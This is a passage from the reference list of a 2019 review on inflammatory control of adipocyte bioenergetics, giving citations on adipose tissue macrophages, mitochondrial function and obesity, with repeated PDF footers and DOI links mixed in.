importing and metabolizing norepinephrine. Nature Medicine 2017 23 1309–1318. (https://doi.org/10.1038/nm.4422) This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:28PM via free access https://doi.org/10.1172/JCI116951 https://doi.org/10.1210/jc.2004-0395 https://doi.org/10.1210/jc.2004-0395 https://doi.org/10.1111/j.1365-201X.2005.01468.x https://doi.org/10.1007/s00125-007-0818-6 https://doi.org/10.1007/s00125-007-0818-6 https://doi.org/10.1016/j.tem.2012.06.004 https://doi.org/10.2337/db07-0510 https://doi.org/10.1111/febs.12096 https://doi.org/10.1210/jc.2013-3042 https://doi.org/10.2337/db14-1937 https://doi.org/10.1371/journal.pmed.0050051 https://doi.org/10.1152/ajpendo.00524.2014 https://doi.org/10.1152/ajpendo.00524.2014 https://doi.org/10.2337/db10-0245 https://doi.org/10.1126/science.7678183 https://doi.org/10.1126/science.7678183 https://doi.org/10.1172/JCI19451 https://doi.org/10.1172/JCI19451 https://doi.org/10.1038/nm1166 https://doi.org/10.1152/ajpgi.00391.2009 https://doi.org/10.1152/ajpgi.00391.2009 https://doi.org/10.1172/JCI118504 https://doi.org/10.1210/en.2004-1520 https://doi.org/10.1210/en.2004-1520 https://doi.org/10.2337/db06-1650 https://doi.org/10.1007/s13105-012-0154-2 https://doi.org/10.1007/s13105-012-0154-2 https://doi.org/10.1152/ajpendo.00422.2013 https://doi.org/10.2337/db12-0399 https://doi.org/10.1172/JCI19246 https://doi.org/10.1016/j.cmet.2014.05.005 https://doi.org/10.1016/j.cmet.2014.05.005 https://doi.org/10.1016/j.cell.2014.03.066 https://doi.org/10.1016/j.cell.2014.03.065 https://doi.org/10.1016/j.cell.2014.03.065 https://doi.org/10.1038/nature10653 https://doi.org/10.1038/nature10653 https://doi.org/10.1038/nm.4316 https://doi.org/10.1038/nm.4422 https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com M Keuper Inflammatory control of adipocyte bioenergetics R116 PB–R17 8:6 31 Feng J, Li L, Ou Z, Li Q, Gong B, Zhao Z, Qi W, Zhou T, Zhong J, Cai W, et al. IL-25 stimulates M2 macrophage polarization and thereby promotes mitochondrial respiratory capacity and lipolysis in adipose tissues against obesity. Cellular and Molecular Immunology 2018 15 493–505. (https://doi.org/10.1038/cmi.2016.71) 32 Qian SW, Wu MY, Wang YN, Zhao YX, Zou Y, Pan JB, Tang Y, Liu Y, Guo L & Tang QQ. BMP4 facilitates beige fat biogenesis via regulating adipose tissue macrophages. Journal of Molecular Cell Biology 2019 11 14–25. (https://doi.org/10.1093/jmcb/mjy011) 33 Lee YH, Kim SN, Kwon HJ, Maddipati KR & Granneman JG. Adipogenic role of alternatively activated macrophages in β-adrenergic remodeling of white adipose tissue. American Journal of Physiology: Regulatory, Integrative and Comparative Physiology 2016 310 R55–R65. (https://doi.org/10.1152/ajpregu.00355.2015) 34 Keuper M, Sachs S, Walheim E, Berti L, Raedle B, Tews D, Fischer- Posovszky P, Wabitsch M, Hrabě de Angelis M, Kastenmüller G, et al. Activated macrophages control human adipocyte mitochondrial bioenergetics via secreted factors. Molecular Metabolism 2017 6 1226–1239. (https://doi.org/10.1016/j.molmet.2017.07.008) 35 Keuper M, Blüher M, Schön MR, Möller P, Dzyakanchuk A, Amrein K, Debatin KM, Wabitsch M & Fischer-Posovszky P. An inflammatory micro-environment promotes human adipocyte apoptosis. Molecular and Cellular Endocrinology 2011 339 105–113. (https://doi. org/10.1016/j.mce.2011.04.004) 36 Ehrlund A, Acosta JR, Björk C, Hedén P, Douagi I, Arner P & Laurencikiene J. The cell-type specific transcriptome in human adipose tissue and influence of obesity on adipocyte progenitors. Scientific Data 2017 4 170164. (https://doi.org/10.1038/ sdata.2017.164) 37 Cancello R, Henegar C, Viguerie N, Taleb S, Poitou C, Rouault C, Coupaye M, Pelloux V, Hugol D, Bouillot JL, et al. Reduction of macrophage infiltration and chemoattractant gene expression changes in white adipose tissue of morbidly obese subjects after surgery-induced weight loss. Diabetes 2005 54 2277–2286. (https:// doi.org/10.2337/diabetes.54.8.2277) 38 Duffaut C, Zakaroff-Girard A, Bourlier V, Decaunes P, Maumus M, Chiotasso P, Sengenès C, Lafontan M, Galitzky J & Bouloumié A. Interplay between human adipocytes and T lymphocytes in obesity: CCL20 as an adipochemokine and T lymphocytes as lipogenic modulators. Arteriosclerosis, Thrombosis, and Vascular Biology 2009 29 1608–1614. (https://doi.org/10.1161/ATVBAHA.109.192583) 39 Curat CA, Miranville A, Sengenès C, Diehl M, Tonus C, Busse R & Bouloumié A. From blood monocytes to adipose tissue- resident macrophages induction of diapedesis by human mature adipocytes. Diabetes 2004 53 1285–1292. (https://doi.org/10.2337/ diabetes.53.5.1285) 40 Curat CA, Wegner V, Sengenès C, Miranville A, Tonus C, Busse R & Bouloumié A. Macrophages in human visceral adipose tissue: increased accumulation in obesity and a source of resistin and visfatin. Diabetologia 2006 49 744–747. (https://doi.org/10.1007/ s00125-006-0173-z) 41 Koppaka S, Kehlenbrink S, Carey M, Li W, Sanchez E, Lee DE, Lee H, Chen J, Carrasco E, Kishore P, et al. Reduced adipose tissue macrophage content is associated with improved insulin sensitivity in thiazolidinedione-treated diabetic humans. Diabetes 2013 62 1843–1854. (https://doi.org/10.2337/db12-0868) 42 van Harmelen V, Skurk T, Röhrig K, Lee YM, Halbleib M, Aprath- Husmann I & Hauner H. Effect of BMI and age on adipose tissue cellularity and differentiation capacity in women. International Journal of Obesity and Related Metabolic Disorders 2003 27 889–895. (https://doi.org/10.1038/sj.ijo.0802314) 43 Zimmerlin L, Donnenberg VS, Pfeifer ME, Meyer EM, Péault B, Rubin JP & Donnenberg AD. Stromal vascular progenitors in adult human adipose tissue. Cytometry: Part A 2010 77 22–30. (https://doi. org/10.1002/cyto.a.20813) 44 Klar AS, Güven S, Zimoch J, Zapiórkowska NA, Biedermann T, Böttcher-Haberzeth S, Meuli-Simmen C, Martin I, Scherberich A, Reichmann E, et al. Characterization of vasculogenic potential of human adipose-derived endothelial cells in a three-dimensional vascularized skin substitute. Pediatric Surgery International 2016 32 17–27. (https://doi.org/10.1007/s00383-015-3808-7) 45 Glastonbury CA, Couto Alves A, El-Sayed Moustafa J & Small KS. Cell-type heterogeneity in adipose tissue is associated with complex traits and reveals disease-relevant cell-specific eQTLs. American Journal of Human Genetics 2019 [epub]. (https://doi.org/10.1016/j. ajhg.2019.03.025) 46 Travers RL, Motta AC, Betts JA, Bouloumié A & Thompson D. The impact of adiposity on adipose tissue-resident lymphocyte activation in humans. International Journal of Obesity 2015 39 762–769. (https:// doi.org/10.1038/ijo.2014.195) 47 Harman-Boehm I, Blüher M, Redel H, Sion-Vardy N, Ovadia S, Avinoach E, Shai I, Klöting N, Stumvoll M, Bashan N, et al. Macrophage infiltration into omental versus subcutaneous fat across different populations: effect of regional adiposity and the comorbidities of obesity. Journal of Clinical Endocrinology and Metabolism 2007 92 2240–2247. (https://doi.org/10.1210/jc.2006-1811) 48 Bruun JM, Lihn AS, Pedersen SB & Richelsen B. Monocyte chemoattractant protein-1 release is higher in visceral than subcutaneous human adipose tissue (AT): implication of macrophages resident in the AT. Journal of Clinical Endocrinology and Metabolism 2005 90 2282–2289. (https://doi.org/10.1210/jc.2004- 1696) 49 Cancello R, Tordjman J, Poitou C, Guilhem G, Bouillot JL, Hugol D, Coussieu C, Basdevant A, Hen AB, Bedossa P, et al. Increased infiltration of macrophages in omental adipose tissue is associated with marked hepatic lesions in morbid human obesity. Diabetes 2006 55 1554–1561. (https://doi.org/10.2337/db06-0133) 50 Spencer M, Yao-Borengasser A, Unal R, Rasouli N, Gurley CM, Zhu B, Peterson CA & Kern PA. Adipose tissue macrophages in insulin- resistant subjects are associated with collagen VI and fibrosis and demonstrate alternative activation. American Journal of Physiology: Endocrinology and Metabolism 2010 299 E1016–E1027. (https://doi. org/10.1152/ajpendo.00329.2010) 51 Blaszczak AM, Jalilvand A, Liu J, Wright VP, Suzo A, Needleman B, Noria S, Lafuse W, Hsueh WA & Bradley D. Human visceral adipose tissue macrophages are not adequately defined by standard methods of characterization. Journal of Diabetes Research 2019 2019 1–7. (https://doi.org/10.1155/2019/8124563) 52 Laparra A, Tricot S, Le Van M, Damouche A, Gorwood J, Vaslin B, Favier B, Benoist S, Ho Tsong Fang R, Bosquet N, et al. The frequencies of immunosuppressive cells in adipose tissue differ in human, non-human primate, and mouse models. Frontiers in Immunology 2019 10 117. (https://doi.org/10.3389/ fimmu.2019.00117) 53 Renovato-Martins M, Matheus ME, de Andrade IR, Moraes JA, da Silva SV, Citelli dos Reis M, de Souza AAP, da Silva CC, Bouskela E & Barja-Fidalgo C. Microparticles derived from obese adipose tissue elicit a pro-inflammatory phenotype of CD16+, CCR5+ and TLR8+ monocytes. Biochimica et Biophysica Acta (BBA): Molecular Basis of Disease 2017 1863 139–151. (https://doi.org/10.1016/j. bbadis.2016.09.016) 54 Weisberg SP, Hunter D, Huber R, Lemieux J, Slaymaker S, Vaddi K, Charo I, Leibel RL & Ferrante AW. CCR2 modulates inflammatory and metabolic effects of high-fat feeding. Journal of Clinical Investigation 2006 116 115–124. (https://doi.org/10.1172/JCI24335) 55 Kanda H, Tateya S, Tamori Y, Kotani K, Hiasa K, Kitazawa R, Kitazawa S, Miyachi H, Maeda S, Egashira K, et al. MCP-1 contributes to macrophage infiltration into adipose tissue, insulin resistance, and hepatic steatosis in obesity. Journal of Clinical Investigation 2006 116 1494–1505. (https://doi.org/10.1172/JCI26498) This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:28PM via free access https://doi.org/10.1038/cmi.2016.71 https://doi.org/10.1093/jmcb/mjy011 https://doi.org/10.1152/ajpregu.00355.2015 https://doi.org/10.1016/j.molmet.2017.07.008 https://doi.org/10.1016/j.mce.2011.04.004 https://doi.org/10.1016/j.mce.2011.04.004 https://doi.org/10.1038/sdata.2017.164 https://doi.org/10.1038/sdata.2017.164 https://doi.org/10.2337/diabetes.54.8.2277 https://doi.org/10.2337/diabetes.54.8.2277 https://doi.org/10.1161/ATVBAHA.109.192583 https://doi.org/10.2337/diabetes.53.5.1285 https://doi.org/10.2337/diabetes.53.5.1285 https://doi.org/10.1007/s00125-006-0173-z https://doi.org/10.1007/s00125-006-0173-z https://doi.org/10.2337/db12-0868 https://doi.org/10.1038/sj.ijo.0802314 https://doi.org/10.1002/cyto.a.20813 https://doi.org/10.1002/cyto.a.20813 https://doi.org/10.1007/s00383-015-3808-7 https://doi.org/10.1016/j.ajhg.2019.03.025 https://doi.org/10.1016/j.ajhg.2019.03.025 https://doi.org/10.1038/ijo.2014.195 https://doi.org/10.1038/ijo.2014.195 https://doi.org/10.1210/jc.2006-1811 https://doi.org/10.1210/jc.2004-1696 https://doi.org/10.1210/jc.2004-1696 https://doi.org/10.2337/db06-0133 https://doi.org/10.1152/ajpendo.00329.2010 https://doi.org/10.1152/ajpendo.00329.2010 https://doi.org/10.1155/2019/8124563 https://doi.org/10.3389/fimmu.2019.00117 https://doi.org/10.3389/fimmu.2019.00117 https://doi.org/10.1016/j.bbadis.2016.09.016 https://doi.org/10.1016/j.bbadis.2016.09.016 https://doi.org/10.1172/JCI24335 https://doi.org/10.1172/JCI26498 https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com M Keuper Inflammatory control of adipocyte bioenergetics R1178:6 56 Cinti S, Mitchell G, Barbatelli G, Murano I, Ceresi E, Faloia E, Wang S, Fortier M, Greenberg AS & Obin MS. Adipocyte death defines macrophage localization and function in adipose tissue of obese mice and humans. Journal of Lipid Research 2005 46 2347–2355. (https://doi.org/10.1194/jlr.M500294-JLR200) 57 Lumeng CN, DeYoung SM, Bodzin JL & Saltiel AR. Increased inflammatory properties of adipose tissue macrophages recruited during diet-induced obesity. Diabetes 2007 56 16–23. (https://doi. org/10.2337/db06-1076) 58 Nguyen MTA, Favelyukis S, Nguyen AK, Reichart D, Scott PA, Jenn A, Liu-Bryan R, Glass CK, Neels JG & Olefsky JM. A subpopulation of macrophages infiltrates hypertrophic adipose tissue and is activated by free fatty acids via toll-like receptors 2 and 4 and JNK-dependent pathways. Journal of Biological Chemistry 2007 282 35279–35292. (https://doi.org/10.1074/jbc.M706762200) 59 Oh DY, Morinaga H, Talukdar S, Bae EJ & Olefsky JM. Increased macrophage migration into adipose tissue in obese mice. Diabetes 2012 61 346–354. (https://doi.org/10.2337/db11-0860) 60 Amano SU, Cohen JL, Vangala P, Tencerova M, Nicoloro SM, Yawe JC, Shen Y, Czech MP & Aouadi M. Local proliferation of macrophages contributes to obesity-associated adipose tissue inflammation. Cell Metabolism 2014 19 162–171. (https://doi. org/10.1016/j.cmet.2013.11.017) 61 Braune J, Weyer U, Hobusch C, Mauer J, Brüning JC, Bechmann I & Gericke M. IL-6 regulates M2 polarization and local proliferation of adipose tissue macrophages in obesity. Journal of Immunology 2017 198 2927–2934. (https://doi.org/10.4049/jimmunol.1600476) 62 Ramkhelawon B, Hennessy EJ, Ménager M, Ray TD, Sheedy FJ, Hutchison S, Wanschel A, Oldebeken S, Geoffrion M, Spiro W, et al. Netrin-1 promotes adipose tissue macrophage retention and insulin resistance in obesity. Nature Medicine 2014 20 377–384. (https://doi. org/10.1038/nm.3467) 63 Brestoff JR, Kim BS, Saenz SA, Stine RR, Monticelli LA, Sonnenberg GF, Thome JJ, Farber DL, Lutfy K, Seale P, et al. Group 2 innate lymphoid cells promote beiging of white adipose tissue and limit obesity. Nature 2015 519 242–246. (https://doi.org/10.1038/ nature14115) 64 Liu PS, Lin YW, Burton FH & Wei LN. Injecting engineered anti- inflammatory macrophages therapeutically induces white adipose tissue browning and improves diet-induced insulin resistance. Adipocyte 2015 4 123–128. (https://doi.org/10.4161/21623945.2014.9 81438) 65 Kosteli A, Sugaru E, Haemmerle G, Martin JF, Lei J, Zechner R & Ferrante AW. Weight loss and lipolysis promote a dynamic immune response in murine adipose tissue. Journal of Clinical Investigation 2010 120 3466–3479. (https://doi.org/10.1172/JCI42845) 66 Fitzgibbons TP & Czech MP. Emerging evidence for beneficial macrophage functions in atherosclerosis and obesity-induced insulin resistance. Journal of Molecular Medicine 2016 94 267–275. (https:// doi.org/10.1007/s00109-016-1385-4) 67 Xu X, Grijalva A, van Skowronski A, van Eijk M, Serlie MJ & Ferrante AW. Obesity activates a program of lysosomal-dependent lipid metabolism in adipose tissue macrophages independently of classic activation. Cell Metabolism 2013 18 816–830. (https://doi. org/10.1016/j.cmet.2013.11.001) 68 Satoh T, Kidoya H, Naito H, Yamamoto M, Takemura N, Nakagawa K, Yoshioka Y, Morii E, Takakura N, Takeuchi O, et al. Critical role of Trib1 in differentiation of tissue-resident M2-like macrophages. Nature 2013 495 524–528. (https://doi.org/10.1038/nature11930) 69 Wu D, Molofsky AB, Liang HE, Ricardo-Gonzalez RR, Jouihan HA, Bando JK, Chawla A & Locksley RM. Eosinophils sustain adipose alternatively activated macrophages associated with glucose homeostasis. Science 2011 332 243–247. (https://doi.org/10.1126/ science.1201475) 70 Lee MW, Odegaard JI, Mukundan L, Qiu Y, Molofsky AB, Nussbaum JC, Yun K, Locksley RM & Chawla A. Activated type 2 innate lymphoid cells regulate beige fat biogenesis. Cell 2015 160 74–87. (https://doi.org/10.1016/j.cell.2014.12.011) 71 Lumeng CN, Bodzin JL & Saltiel AR. Obesity induces a phenotypic switch in adipose tissue macrophage polarization. Journal of Clinical Investigation 2007 117 175–184. (https://doi.org/10.1172/ JCI29881) 72 Boutagy NE, McMillan RP, Frisard MI & Hulver MW. Metabolic endotoxemia with obesity: is it real and is it relevant? Biochimie 2016 124 11–20. (https://doi.org/10.1016/j.biochi.2015.06.020) 73 Murray PJ, Allen JE, Biswas SK, Fisher EA, Gilroy DW, Goerdt S, Gordon S, Hamilton JA, Ivashkiv LB, Lawrence T, et al. Macrophage activation and polarization: nomenclature and experimental guidelines. Immunity 2014 41 14–20. (https://doi.org/10.1016/j. immuni.2014.06.008) 74 Thomas AC & Mattila JT. ‘Of Mice and Men’: arginine metabolism in macrophages. Frontiers in Immunology 2014 5 479. (https://doi. org/10.3389/fimmu.2014.00479) 75 Raes G, den Bergh RV, Baetselier PD & Ghassabeh GH. Arginase-1 and Ym1 are markers for murine, but not human, alternatively activated myeloid cells. Journal of Immunology 2005 174 6561–6562. (https:// doi.org/10.4049/jimmunol.174.11.6561) 76 Schneemann M & Schoeden G. Macrophage biology and immunology: man is not a mouse. Journal of Leukocyte Biology 2007 81 579–579. (https://doi.org/10.1189/jlb.1106702) 77 Gross TJ, Kremens K, Powers LS, Brink B, Knutson T, Domann FE, Philibert RA, Milhem MM & Monick MM. Epigenetic silencing of the human NOS2 gene: rethinking the role of nitric oxide in human macrophage inflammatory responses. Journal of Immunology 2014 192 2326–2338. (https://doi.org/10.4049/jimmunol.1301758) 78 Fjeldborg K, Pedersen SB, Møller HJ, Christiansen T, Bennetzen M & Richelsen B. Human adipose tissue macrophages are enhanced but changed to an anti-inflammatory profile in obesity. Journal of Immunology Research 2014 2014 1–10. (https://doi. org/10.1155/2014/309548) 79 Li P, Lu M, Nguyen MTA, Bae EJ, Chapman J, Feng D, Hawkins M, Pessin JE, Sears DD, Nguyen AK, et al. Functional heterogeneity of CD11c-positive adipose tissue macrophages in diet-induced obese mice. Journal of Biological Chemistry 2010 285 15333–15345. (https:// doi.org/10.1074/jbc.M110.100263) 80 Wentworth JM, Naselli G, Brown WA, Doyle L, Phipson B, Smyth GK, Wabitsch M, O’Brien PE & Harrison LC. Pro-inflammatory CD11c+CD206+ adipose tissue macrophages are associated with insulin resistance in human obesity. Diabetes 2010 59 1648–1656. (https://doi.org/10.2337/db09-0287) 81 Nakajima S, Koh V, Kua LF, So J, Davide L, Lim KS, Petersen SH, Yong WP, Shabbir A & Kono K. Accumulation of CD11c+CD163+ adipose tissue macrophages through upregulation of intracellular 11β-HSD1 in human obesity. Journal of Immunology 2016 197 3735–3745. (https://doi.org/10.4049/jimmunol.1600895: 27698011) 82 Zeyda M, Farmer D, Todoric J, Aszmann O, Speiser M, Györi G, Zlabinger GJ & Stulnig TM. Human adipose tissue macrophages are of an anti-inflammatory phenotype but capable of excessive pro- inflammatory mediator production. International Journal of Obesity 2007 31 1420–1428. (https://doi.org/10.1038/sj.ijo.0803632) 83 Kratz M, Coats BR, Hisert KB, Hagman D, Mutskov V, Peris E, Schoenfelt KQ, Kuzma JN, Larson I, Billing PS, et al. Metabolic dysfunction drives a mechanistically distinct proinflammatory phenotype in adipose tissue macrophages. Cell Metabolism 2014 20 614–625. (https://doi.org/10.1016/j.cmet.2014.08.010) 84 Fassina G, Dorigo P, Badetti R & Visco L. Effect of oxidative phosphorylation inhibitors on cyclic adenosine monophosphate synthesis in rat adipose tissue. Biochemical Pharmacology 1972 21 1633–1639. (https://doi.org/10.1016/0006-2952(72)90313-9) 85 Demine S, Tejerina S, Bihin B, Thiry M, Reddy N, Renard P, Raes M, Jadot M & Arnould T. Mild mitochondrial uncoupling induces HSL/ ATGL-independent lipolysis relying on a form of autophagy in 3T3- This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:28PM via free access https://doi.org/10.1194/jlr.M500294-JLR200 https://doi.org/10.2337/db06-1076 https://doi.org/10.2337/db06-1076 https://doi.org/10.1074/jbc.M706762200 https://doi.org/10.2337/db11-0860 https://doi.org/10.1016/j.cmet.2013.11.017 https://doi.org/10.1016/j.cmet.2013.11.017 https://doi.org/10.4049/jimmunol.1600476 https://doi.org/10.1038/nm.3467 https://doi.org/10.1038/nm.3467 https://doi.org/10.1038/nature14115 https://doi.org/10.1038/nature14115 https://doi.org/10.4161/21623945.2014.981438 https://doi.org/10.4161/21623945.2014.981438 https://doi.org/10.1172/JCI42845 https://doi.org/10.1007/s00109-016-1385-4 https://doi.org/10.1007/s00109-016-1385-4 https://doi.org/10.1016/j.cmet.2013.11.001 https://doi.org/10.1016/j.cmet.2013.11.001 https://doi.org/10.1038/nature11930 https://doi.org/10.1126/science.1201475 https://doi.org/10.1126/science.1201475 https://doi.org/10.1016/j.cell.2014.12.011 https://doi.org/10.1172/JCI29881 https://doi.org/10.1172/JCI29881 https://doi.org/10.1016/j.biochi.2015.06.020 https://doi.org/10.1016/j.immuni.2014.06.008 https://doi.org/10.1016/j.immuni.2014.06.008 https://doi.org/10.3389/fimmu.2014.00479 https://doi.org/10.3389/fimmu.2014.00479 https://doi.org/10.4049/jimmunol.174.11.6561 https://doi.org/10.4049/jimmunol.174.11.6561 https://doi.org/10.1189/jlb.1106702 https://doi.org/10.4049/jimmunol.1301758 https://doi.org/10.1155/2014/309548 https://doi.org/10.1155/2014/309548 https://doi.org/10.1074/jbc.M110.100263 https://doi.org/10.1074/jbc.M110.100263 https://doi.org/10.2337/db09-0287 https://doi.org/10.4049/jimmunol.1600895 27698011 https://doi.org/10.1038/sj.ijo.0803632 https://doi.org/10.1016/j.cmet.2014.08.010 https://doi.org/10.1016/0006-2952(72)90313-9 https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com M Keuper Inflammatory control of adipocyte bioenergetics R118 PB–R17 8:6 L1 adipocytes. Journal of Cellular Physiology 2018 233 1247–1265. (https://doi.org/10.1002/jcp.25994) 86 Maassen JA, Romijn JA & Heine RJ. Fatty acid-induced mitochondrial uncoupling in adipocytes as a key protective factor against insulin resistance and beta cell dysfunction: a new concept in the pathogenesis of obesity-associated type 2 diabetes mellitus. Diabetologia 2007 50 2036–2041. (https://doi.org/10.1007/s00125- 007-0776-z) 87 Contreras L, Drago I, Zampese E & Pozzan T. Mitochondria: the calcium connection. Biochimica et Biophysica Acta 2010 1797 607–618. (https://doi.org/10.1016/j.bbabio.2010.05.005) 88 Pershadsingh HA, Shade DL, Delfert DM & McDonald JM. Chelation of intracellular calcium blocks insulin action in the adipocyte. PNAS 1987 84 1025–1029. (https://doi.org/10.1073/pnas.84.4.1025) 89 Wang Y, Ali Y, Lim CY, Hong W, Pang ZP & Han W. Insulin- stimulated leptin secretion requires calcium and PI3K/Akt activation. Biochemical Journal 2014 458 491–498. (https://doi.org/10.1042/ BJ20131176) 90 Wang CH, Chen YF, Wu CY, Wu PC, Huang YL, Kao CH, Lin CH, Kao LS, Tsai TF & Wei YH. Cisd2 modulates the differentiation and functioning of adipocytes by regulating intracellular Ca2+ homeostasis. Human Molecular Genetics 2014 23 4770–4785. (https:// doi.org/10.1093/hmg/ddu193) 91 Shi H, Halvorsen YD, Ellis PN, Wilkison WO & Zemel MB. Role of intracellular calcium in human adipocyte differentiation. Physiological Genomics 2000 3 75–82. (https://doi.org/10.1152/ physiolgenomics.2000.3.2.75) 92 Wright LE, Vecellio Reane D, Milan G, Terrin A, Di Bello G, Belligoli A, Sanna M, Foletto M, Favaretto F, Raffaello A, et al. Increased mitochondrial calcium uniporter in adipocytes underlies mitochondrial alterations associated with insulin resistance. American Journal of Physiology: Endocrinology and Metabolism 2017 313 E641–E650. (https://doi.org/10.1152/ajpendo.00143.2016) 93 Tormos KV, Anso E, Hamanaka RB, Eisenbart J, Joseph J, Kalyanaraman B & Chandel NS. Mitochondrial complex III ROS regulate adipocyte differentiation. Cell Metabolism 2011 14 537–544. (https://doi.org/10.1016/j.cmet.2011.08.007) 94 Zhang Y, Marsboom G, Toth PT & Rehman J. Mitochondrial respiration regulates adipogenic differentiation of human mesenchymal stem cells. PLoS ONE 2013 8 e77077. (https://doi. org/10.1371/journal.pone.0077077) 95 Keuper M, Jastroch M, Yi CX, Fischer-Posovszky P, Wabitsch M, Tschop MH & Hofmann SM. Spare mitochondrial respiratory capacity permits human adipocytes to maintain ATP homeostasis under hypoglycemic conditions. FASEB Journal 2014 28 761–770. (https://doi.org/10.1096/fj.13-238725) 96 Wilson-Fritch L, Burkart A, Bell G, Mendelson K, Leszyk J, Nicoloro S, Czech M & Corvera S. Mitochondrial biogenesis and remodeling during adipogenesis and in response to the insulin sensitizer rosiglitazone. Molecular and Cellular Biology 2003 23 1085–1094. (https://doi.org/10.1128/MCB.23.3.1085-1094.2003) 97 Böttcher H & Fürst P. Microcalorimetric and biochemical investigations of thermogenesis and metabolic pathways in human white adipocytes. International Journal of Obesity and Related Metabolic Disorders 1996 20 874–881. 98 von Heimburg Dv, Hemmrich K, Zachariah S, Staiger H & Pallua N. Oxygen consumption in undifferentiated versus differentiated adipogenic mesenchymal precursor cells. Respiratory Physiology and Neurobiology 2005 146 107–116. (https://doi.org/10.1016/j. resp.2004.12.013) 99 Kraunsøe R, Boushel R, Hansen CN, Schjerling P, Qvortrup K, Støckel M, Mikines KJ & Dela F. Mitochondrial respiration in subcutaneous and visceral adipose tissue from patients with morbid obesity. Journal of Physiology 2010 588 2023–2032. (https://doi. org/10.1113/jphysiol.2009.184754) 100 Schöttl T, Kappler L, Braun K, Fromme T & Klingenspor M. Limited mitochondrial capacity of visceral versus subcutaneous white adipocytes in male C57BL/6N mice. Endocrinology 2015 156 923–933. (https://doi.org/10.1210/en.2014-1689) 101 Krief S, Lönnqvist F, Raimbault S, Baude B, Van Spronsen A, Arner P, Strosberg AD, Ricquier D & Emorine LJ. Tissue distribution of beta 3-adrenergic receptor mRNA in man. Journal of Clinical Investigation 1993 91 344–349. (https://doi.org/10.1172/JCI116191) 102 Villaret A, Galitzky J, Decaunes P, Estève D, Marques MA, Sengenès C, Chiotasso P, Tchkonia T, Lafontan M, Kirkland JL, et al. Adipose tissue endothelial cells from obese human subjects: differences among depots in angiogenic, metabolic, and inflammatory gene expression and cellular senescence. Diabetes 2010 59 2755–2763. (https://doi.org/10.2337/db10-0398) 103 Vatier C, Kadiri S, Muscat A, Chapron C, Capeau J & Antoine B. Visceral and subcutaneous adipose tissue from lean women respond differently to lipopolysaccharide-induced alteration of inflammation and glyceroneogenesis. Nutrition and Diabetes 2012 2 e51. (https:// doi.org/10.1038/nutd.2012.29) 104 Keuper M, Berti L, Raedle B, Sachs S, Böhm A, Fritsche L, Fritsche A, Häring HU, Hrabě de Angelis M, Jastroch M, et al. Preadipocytes of obese humans display gender-specific bioenergetic responses to glucose and insulin. Molecular Metabolism 2019 20 28–37. (https:// doi.org/10.1016/j.molmet.2018.11.006) 105 Campbell PJ, Carlson MG, Hill JO & Nurjhan N. Regulation of free fatty acid metabolism by insulin in humans: role of lipolysis and reesterification. American Journal of Physiology 1992 263 E1063–E1069. (https://doi.org/10.1152/ajpendo.2006.263.6.E1063) 106 Reshef L, Olswang Y, Cassuto H, Blum B, Croniger CM, Kalhan SC, Tilghman SM & Hanson RW. Glyceroneogenesis and the triglyceride/ fatty acid cycle. Journal of Biological Chemistry 2003 278 30413–30416. (https://doi.org/10.1074/jbc.R300017200) 107 Flachs P, Rossmeisl M, Kuda O & Kopecky J. Stimulation of mitochondrial oxidative capacity in white fat independent of UCP1: a key to lean phenotype. Biochimica et Biophysica Acta 2013 1831 986–1003. (https://doi.org/10.1016/j.bbalip.2013.02.003) 108 Guilherme A, Virbasius JV, Puri V & Czech MP. Adipocyte dysfunctions linking obesity to insulin resistance and type 2 diabetes. Nature Reviews: Molecular Cell Biology 2008 9 367–377. (https://doi.org/10.1038/nrm2391) 109 Wilson-Fritch L, Nicoloro S, Chouinard M, Lazar MA, Chui PC, Leszyk J, Straubhaar J, Czech MP & Corvera S. Mitochondrial remodeling in adipose tissue associated with obesity and treatment with rosiglitazone. Journal of Clinical Investigation 2004 114 1281–1289. (https://doi.org/10.1172/JCI21752) 110 Yeo CR, Agrawal M, Hoon S, Shabbir A, Shrivastava MK, Huang S, Khoo CM, Chhay V, Yassin MS, Tai ES, et al. SGBS cells as a model of human adipocyte browning: a comprehensive comparative study with primary human white subcutaneous adipocytes. Scientific Reports 2017 7 4031. (https://doi.org/10.1038/s41598-017-04369-2) 111 Sörbris R, Nilsson-Ehle P, Monti M & Wadsö I. Differences in heat production between adipocytes from obese and normal weight individuals. FEBS Letters 1979 101 411–414. (https://doi. org/10.1016/0014-5793(79)81056-X) 112 DiGirolamo M, Newby FD & Lovejoy J. Lactate production in adipose tissue: a regulated function with extra-adipose implications. FASEB Journal 1992 6 2405–2412. (https://doi.org/10.1096/ fasebj.6.7.1563593) 113 van der Merwe MT, Schlaphoff GP, Crowther NJ, Boyd IH, Gray IP, Joffe BI & Lönnroth PN. Lactate and glycerol release from adipose tissue in lean, obese, and diabetic women from South Africa. Journal of Clinical Endocrinology and Metabolism 2001 86 3296–3303. (https:// doi.org/10.1210/jcem.86.7.7670) 114 Simoneau JA & Kelley DE. Altered glycolytic and oxidative capacities of skeletal muscle contribute to insulin resistance in NIDDM. Journal This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 